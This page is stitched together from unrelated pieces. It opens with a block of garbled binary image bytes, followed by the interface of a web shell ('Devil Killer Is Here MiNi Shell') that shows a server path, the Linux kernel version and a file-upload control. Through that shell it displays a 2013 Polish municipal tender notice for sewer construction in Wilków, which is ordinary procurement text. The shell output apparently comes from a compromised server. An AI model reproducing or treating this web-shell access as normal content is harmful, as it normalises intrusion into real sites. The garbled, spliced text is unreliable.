JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/46309-N-2013.html

<p class="kh_header"><b>Wilków: Rozwiązywanie problemów gospodarki ściekowej w powiecie namysłowskim -budowa kanalizacji sanitarnej  w miejscowości Wilków.</b><br>
<b>Numer ogłoszenia: 46309 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wilków , ul. Wrocławska 11, 46-113 Wilków, woj. opolskie, tel. 077 4195511, 4195513, faks 077 4195511.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> wilkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwiązywanie problemów gospodarki ściekowej w powiecie namysłowskim -budowa kanalizacji sanitarnej  w miejscowości Wilków..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest budowa kanalizacji sanitarnej w miejscowości  Wilków   w ramach zadania inwestycyjnego pn:Rozwiązanie problemów gospodarki ściekowej    w powiecie namysłowskim - budowa kanalizacji sanitarnej w miejscowości Wilków .
  
 Miejsce realizacji zamówienia : 
 Miejscowość  Wilków, nr obrębu :0062, nr działek ewidencyjnych :
 754/9, 754/11, 754/6, 754/18, 59/1, 1417/2, 1418, 1413/2, 1410, 1363, 222, 221, 1360, 220, 1359, 219, 1358, 355/1, 121/1, 1661/1, 1661/2, 123, 1470, 1467/2,1469, 1440, 1436, 1422, 1247, 1527, 369/30, 369/38, 369/36, 369/26, 1479, 410/4, 1485, 131/18, 1483, 171/24, 171/4, 171/5,171/6, 171/7, 1489, 1490, 153/19, 1497, 152/17, 1653, 153/8, 152/8, 1033/6, 1635, 1636, 1034/8, 1035/9, 1608/1,1634, 1035/10, 1546, 1347/5
Zakres prac do wykonania:
Kanalizacja sanitarna:
Kanały główne:
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków,
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni dróg i autostrad
Rurociągi tłoczne:
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków.
roboty w zakresie konstruowania, fundamentowania oraz wykonywania                    nawierzchni dróg i autostrad
Przepompownie ścieków:
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty inżynieryjne i budowlane
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg
przepompownia ścieków PW-1
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty inżynieryjne i budowlane
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg
przepompownia ścieków PW-2
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty inżynieryjne i budowlane
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg
przepompownia ścieków PW-3
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty inżynieryjne i budowlane
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg
przepompownia ścieków PW-4
Przyłącza do wykonania z siecią uliczną:
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków,
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni dróg i autostrad
Przyłącza na posesjach:
roboty w zakresie przygotowania terenu pod budowę i roboty ziemne,
roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków,
roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni dróg i autostrad.
 Roboty elektryczne:
Przyłącz energetyczny oraz zasilanie przepompowni ścieków PW-1:
przyłącz kablowy oraz złącze kablowo-pomiarowe,
linia kablowa do rozdzielnicy RPW1 przepompowni ścieków, 
rozdzielnica RPW1 przepompowni ścieków, 
instalacje w przepompowni ścieków, 
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna,
Przyłącz energetyczny oraz za zasilanie przepompowni ścieków PW-2:
przyłącz kablowy oraz złącze kablowo-pomiarowe,
linia kablowa do rozdzielnicy RPW2 przepompowni ścieków,
rozdzielnica RPW2 przepompowni ścieków,
instalacje w przepompowni ścieków,
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna,
Przyłącz energetyczny oraz za zasilanie przepompowni ścieków PW-3: 
przyłącz kablowy oraz złącze kablowo-pomiarowe,
linia kablowa do rozdzielnicy RPW3 przepompowni ścieków
rozdzielnica RPW3 przepompowni ścieków,
instalacje w przepompowni ścieków,
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna,
Przyłącz energetyczny oraz za zasilanie przepompowni ścieków PW-4: 
przyłącz kablowy oraz złącze kablowo-pomiarowe,
linia kablowa do rozdzielnicy RPW4 przepompowni ścieków
rozdzielnica RPW4 przepompowni ścieków,
instalacje w przepompowni ścieków,
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna,
Przyłącz energetyczny oraz za zasilanie komory pomiarowej KP1: 
przyłącz kablowy oraz złącze kablowo-pomiarowe,
linia kablowa do rozdzielnicy RKP1 komory pomiarowej
rozdzielnica RKP1 komory pomiarowej,
instalacje w komorze pomiarowej,
oprogramowanie układu ,
obsługa geodezyjna,
Zasilanie przepompowni przydomowej Pp1 Pp2
Zasilenie przepompowni przydomowej ścieków Pp1 dz.369/38
linia zasilająca,
           - rozdzielnica przydomowej przepompowni ścieków -dostawa wraz z                            technologią,
instalacje w przepompowni ścieków,
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna.
Zasilenie przepompowni przydomowej ścieków Pp2 dz.84
linia zasilająca,
           - rozdzielnica przydomowej przepompowni ścieków -dostawa wraz z                            technologią,
instalacje w przepompowni ścieków,
oprogramowanie układu oraz prace regulacyjno-rozruchowe,
obsługa geodezyjna.

Opis instalacji: Szczegółowy opis robót zawarto w Projekcie Budowlanym i Wykonawczym. 
Uwaga ! Sieć kanalizacji Wilkowa należy połączyć z siecią tranzytu Wilków- Namysłów.
Wszystkie nieruchomości położone we wsi Wilków należy podłączyć do sieci kanalizacyjnej.
Roboty należy wykonać zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane, projektem budowlanym, pozwoleniami na budowę, zgłoszeniem budowy przyłączy, przedmiarem robót, specyfikacją techniczną wykonania i odbioru robót , sztuką budowlaną, wszelkimi niezbędnymi przepisami, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej zapewniając bezpieczne i higieniczne warunki pracy.
Składający oferty wykonawcy zobowiązani są do zapoznania się z istotnymi przepisami prawa, aktami i regulacjami obowiązującymi w Polsce, które w jakikolwiek sposób mogą wpływać lub odnosić się do działań podejmowanych w związku z przetargiem i w następstwie  podpisania umowy. Wykonawca jest zobowiązany do podjęcia wszelkich działań (np. wizyta miejsca realizacji robót, zapoznanie się z: projektem budowlanym , ogólną specyfikacją techniczną, pozwoleniem na budowę, zgłoszeniem budowy przyłączy, przedmiarem robót oraz innymi działaniami) w celu oszacowania na własną odpowiedzialność kosztów i ryzyka oraz uzyskania wszelkich danych, jakie mogą być niezbędne w przygotowaniu oferty i podpisaniu Umowy.
Wykonawcy będą odpowiedzialni za staranne zaznajomienie się ze SIWZ, w tym również  z dokumentacją projektową , specyfikacją techniczną , wszelkimi zmianami do SIWZ sporządzonymi w okresie przetargowym, oraz za uzyskanie wiarygodnych informacji dotyczących poszczególnych warunków i obowiązków, które mogą w jakikolwiek sposób oddziaływać na sumę czy istotę oferty lub na wykonanie robót.
     W trakcie prowadzenia robót Wykonawca jest zobowiązany do :
Prowadzenia robót zgodnie z Dokumentacją Budowy i Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych,
 Przedstawienia aprobat technicznych, certyfikatów, świadectw dopuszczalności na wbudowane urządzenia i materiały budowlane,
Przedstawienia dokumentacji techniczno-ruchowej (DTR) przepompowni ścieków,
Przedstawienia protokołów badań i sprawdzeń urządzeń z rozruchu dopuszczających do eksploatacji,
Przedstawienia protokołów badań wszystkich przewodów (grawitacyjnych, tłocznych i przyłączy) w zakresie szczelności na eksfiltrację ścieków do gruntu i filtrację wód gruntowych do kanału, badań gruntu (wskaźnik zagęszczenia) i instalacji elektrycznych,
Wykonania inspekcji telewizyjnej sieci kanalizacji sanitarnej po jej wykonaniu wraz z raportem inspekcji, przy czym inspekcja ma potwierdzić prawidłowe wykonanie rurociągu.
Inspekcja telewizyjna sieci kanalizacji sanitarnej musi charakteryzować się następującymi cechami:
czytelna ostrość obrazu,
wszystkie kinety i połączenia rur muszą być sfilmowane na całej długości,
zapis inspekcji ma potwierdzać faktycznie spadki dna kanału,
suma odcinków sfilmowanych musi zawierać całość przedmiotu zamówienia.
Dokumentacja po wykonaniu inspekcji obejmuje:
płytę CD z nagranym raportem,
mapę z zaznaczoną trasą kanału, numerami studzienek, początkiem i końcem inspekcji,
wykresy spadku dna kanału,
fotoraport uszkodzeń,
opis studzienek kanalizacyjnych,
obmiar wykonanych prac z wyszczególnieniem kolejnego numeru inspekcji, długości badanych odcinków, ulicy, materiału, z którego wykonany jest kanał, ilości wykonanych fotografii.
Zapewnienia obsługi geodezyjnej, wykonania inwentaryzacji geodezyjnej powykonawczej. Namiar geodezyjny powykonawczy w skali 1:500 w 2 egzemplarzach wykonany przez uprawnionego geodetę, w formie papierowej i numerycznej (na nośniku elektronicznym * dwa). 
Wywozu gruzu, odpadów poza teren prowadzenia robót budowlanych, na składowisko odpadów. Wykonawca musi przedstawić kartę przyjęcia gruzu na wysypisko.
Zapewnienia i utrzymania bezpieczeństwa terenu budowy oraz robót poza placem budowy, a w szczególności: zabezpieczenia terenu budowy przed dostępem osób nieupoważnionych i wykonania organizacji ruchu zastępczego wg uzgodnionego projektu, zapewniając bezpieczne dojścia i dojazdy do istniejących posesji. 
Wykonawca zobowiązany jest doprowadzić nawierzchnie ulic, trawników, elewacji budynków i innych obiektów naruszonych w trakcie realizacji przedmiotu zamówienia do stanu pierwotnego.
Wykonawca zobowiązany jest także dokonać wszelkich uzgodnień i ewentualnych opłat związanych z zajęciem pasa drogowego oraz innych opłat związanych z realizacją przedmiotu zamówienia. W razie konieczności Wykonawca zapewni i wykona zastępczą organizację ruchu kołowego na czas trwania robót wg projektu organizacji ruchu sporządzonego przez Wykonawcę.
Warunki wymagane do spełnienia przez Wykonawcę:
Na Wykonawcy spoczywa odpowiedzialność za ochronę przekazanych punktów pomiarowych do chwili przejęcia przez Zamawiającego, uszkodzone lub zniszczone znaki geodezyjne odtworzy i utrwali na własny koszt.
Wszelkie koszty związane z aktualizacją decyzji i uzgodnień Wykonawca uwzględni w cenie kontraktowej i nie będzie żądał za nie osobnej zapłaty. Wykonawca pokryje również wszystkie koszty, o których mowa w decyzjach administracyjnych.
Wykonawca ma obowiązek znać i stosować w czasie prowadzenia robót wszelkie przepisy dotyczące ochrony środowiska naturalnego.
Wykonawca będzie przestrzegać przepisów ochrony przeciwpożarowej.
W przypadku konieczności odwodnienia terenu robót i zabezpieczenia przed dopływem wód Wykonawca na własny koszt przeprowadzi niezbędne badania i sporządzi projekt odwodnienia terenu robót, uwzględniając hydrogeologiczne właściwości podłoża, przewidywane parametry wykopów oraz rodzaj budowli, warunków posadowienia budowli sąsiednich dla danego obiektu. Projekt podlega zatwierdzeniu przez właściwe organy administracji państwowej.
Na roboty jw. wykonawca udzieli gwarancji na okres 5 lat licząc od daty  protokołu odbioru robót.
Zamawiający dopuszcza rozwiązania równoważne. Jeśli w dokumentacji  technicznej, stanowiącej integralną cześć do niniejszej SIWZ zostały wprowadzone nazwy własne materiałów lub produktów, Zamawiający dopuszcza zastosowanie produktów równoważnych do wskazanych pod warunkiem posiadania przez te materiały i produkty nie gorszych parametrów technicznych, charakteryzujących wskazany produkt stanowiący o ich przydatności, charakterze, wytrzymałości.
Nie dopuszcza się składania ofert częściowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających do wysokości 50% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówienia i zgodnego z przedmiotem zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.13.00-8, 45.23.24.00-6, 45.23.24.10-9, 45.23.24.20-2, 45.23.24.23-3, 45.23.24.40-8, 45.23.24.60-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  w wysokości: 150 000,00 zł.                                  (słownie : sto pięćdziesiąt tysięcy i 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego warunku -załącznik Nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>:  Zamawiający uzna , że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże w wykazie robót budowlanych, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej jedną robotę budowlaną, odpowiadającą swym  zakresem przedmiotowi zamówienia , z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących , czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 Wartość  roboty nie może być mniejsza niż  3 500 000,00 zł brutto.
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich Wykonawców łącznie).
 Wykonawca złoży również oświadczenie o spełnieniu tego warunku -załącznik Nr 1 do formularza oferty.
W przypadku robót ,których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia robót ( w przypadku robót rozliczanych wyłącznie w walutach innych niż PLN).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie dysponowania odpowiednim potencjałem technicznym żadnych wymagań , których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego warunku -załącznik Nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli przedstawi wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami oraz złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.  
Wykonawca musi wykazać, że osoba  będąca pełnić funkcję kierownika budowy            posiada uprawnienia  w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych.
Kierownicy robót powinni mieć uprawnienia w specjalności :
-drogowej, 
-konstrukcyjno-budowlanej ,
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                    i elektroenergetycznych. 
Zamawiający dopuszcza możliwość łączenia funkcji osób zdolnych do wykonania zamówienia.

(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców ocena w/w warunku dotyczyć będzie wszystkich Wykonawców łącznie).
 Wykonawca złoży również oświadczenie o spełnieniu tego warunku -załącznik Nr 1 do formularza oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w zakresie sytuacji ekonomicznej i finansowej żadnych wymagań , których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu tego warunku -załącznik Nr 1 do formularza oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
